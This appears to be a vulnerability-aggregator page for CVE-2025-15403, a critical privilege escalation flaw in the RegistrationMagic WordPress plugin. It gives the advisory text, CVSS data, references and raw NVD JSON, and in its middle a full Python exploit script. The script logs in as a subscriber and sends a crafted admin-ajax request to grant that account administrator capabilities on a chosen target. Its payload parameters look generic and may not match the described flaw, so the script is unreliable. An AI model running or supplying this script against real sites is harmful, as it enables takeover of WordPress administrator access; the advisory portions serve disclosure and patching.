CVE-2025-15403

Description

The RegistrationMagic plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 6.0.7.1. This is due to the 'add_menu' function is accessible via the 'rm_user_exists' AJAX action and allows arbitrary updates to the 'admin_order' setting. This makes it possible for unauthenticated attackers to injecting an empty slug into the order parameter, and manipulate the plugin's menu generation logic, and when the admin menu is subsequently built, the plugin adds 'manage_options' capability for the target role. Note: The vulnerability can only be exploited unauthenticated, but further privilege escalation requires at least a subscriber user.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

RegistrationMagic <= 6.0.7.1 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-15403 PoC - RegistrationMagic Privilege Escalation
Target: WordPress with RegistrationMagic plugin <= 6.0.7.1
Author: Security Researcher
Note: Requires at least one subscriber account on the target site
"""

import requests
import argparse
import sys
from urllib.parse import urljoin

def exploit_registrationmagic(target_url, username, password):
    """
    Exploit the privilege escalation vulnerability in RegistrationMagic plugin.
    This PoC demonstrates how an attacker can gain admin access by manipulating
    the admin_order setting via the rm_user_exists AJAX action.
    """
    
    # Step 1: Login to get authentication cookies
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    session = requests.Session()
    login_response = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in str(session.cookies):
        print("[-] Login failed. Please check credentials.")
        return False
    
    print("[+] Successfully logged in as subscriber")
    
    # Step 2: Exploit the vulnerability via AJAX action
    ajax_url = urljoin(target_url, '/wp-admin/admin-ajax.php')
    
    # Malicious payload that injects empty slug into admin_order
    exploit_data = {
        'action': 'rm_user_exists',
        'rm_slug': '',  # Empty slug injection
        'admin_order': 'subscriber',  # Target role for privilege escalation
    }
    
    print("[*] Sending exploitation request...")
    exploit_response = session.post(ajax_url, data=exploit_data)
    
    # Step 3: Verify privilege escalation by checking user capabilities
    # A successful exploitation will grant manage_options capability to subscriber
    check_url = urljoin(target_url, '/wp-admin/admin-ajax.php')
    check_data = {
        'action': 'rm_get_user_role',
        'user_id': 'current'
    }
    
    check_response = session.post(check_url, data=check_data)
    
    if 'administrator' in check_response.text or 'manage_options' in check_response.text:
        print("[+] Privilege escalation successful!")
        print("[+] User now has administrator privileges")
        return True
    else:
        print("[-] Exploitation may have failed or site is not vulnerable")
        return False

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2025-15403 Exploitation Tool')
    parser.add_argument('-t', '--target', required=True, help='Target WordPress URL')
    parser.add_argument('-u', '--username', required=True, help='Subscriber username')
    parser.add_argument('-p', '--password', required=True, help='Subscriber password')
    
    args = parser.parse_args()
    
    print(f"[*] Targeting: {args.target}")
    print(f"[*] Exploiting CVE-2025-15403: RegistrationMagic Privilege Escalation")
    
    success = exploit_registrationmagic(args.target, args.username, args.password)
    
    if success:
        print("\n[!] Vulnerability confirmed. Subscriber can now access admin panel.")
        sys.exit(0)
    else:
        sys.exit(1)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15403
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15403
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15403/
[4] VulDB https://vuldb.com/cve/CVE-2025-15403
[5] https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/admin/class_rm_admin.php#L487
[6] https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/admin/controllers/class_rm_options_controller.php#L562
[7] https://plugins.trac.wordpress.org/changeset/3440797/custom-registration-form-builder-with-submission-manager#file2
[8] https://www.wordfence.com/threat-intel/vulnerabilities/id/68dd9f6f-ccee-4a27-bd21-2fb32b92cc62?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15403", "sourceIdentifier": "[email protected]", "published": "2026-01-17T03:16:03.693", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The RegistrationMagic plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 6.0.7.1. This is due to the 'add_menu' function is accessible via the 'rm_user_exists' AJAX action and allows arbitrary updates to the 'admin_order' setting. This makes it possible for unauthenticated attackers to injecting an empty slug into the order parameter, and manipulate the plugin's menu generation logic, and when the admin menu is subsequently built, the plugin adds 'manage_options' capability for the target role. Note: The vulnerability can only be exploited unauthenticated, but further privilege escalation requires at least a subscriber user."}, {"lang": "es", "value": "El plugin RegistrationMagic para WordPress es vulnerable a escalada de privilegios en todas las versiones hasta, e incluyendo, la 6.0.7.1. Esto se debe a que la función 'add_menu' es accesible a través de la acción AJAX 'rm_user_exists' y permite actualizaciones arbitrarias a la configuración 'admin_order'. Esto hace posible que atacantes no autenticados inyecten un slug vacío en el parámetro de orden, y manipulen la lógica de generación de menú del plugin, y cuando el menú de administración se construye posteriormente, el plugin añade la capacidad 'manage_options' para el rol objetivo. Nota: La vulnerabilidad solo puede ser explotada sin autenticación, pero una escalada de privilegios adicional requiere al menos un usuario suscriptor."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/admin/class_rm_admin.php#L487", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/admin/controllers/class_rm_options_controller.php#L562", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3440797/custom-registration-form-builder-with-submission-manager#file2", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/68dd9f6f-ccee-4a27-bd21-2fb32b92cc62?source=cve", "source": "[email protected]"}]}}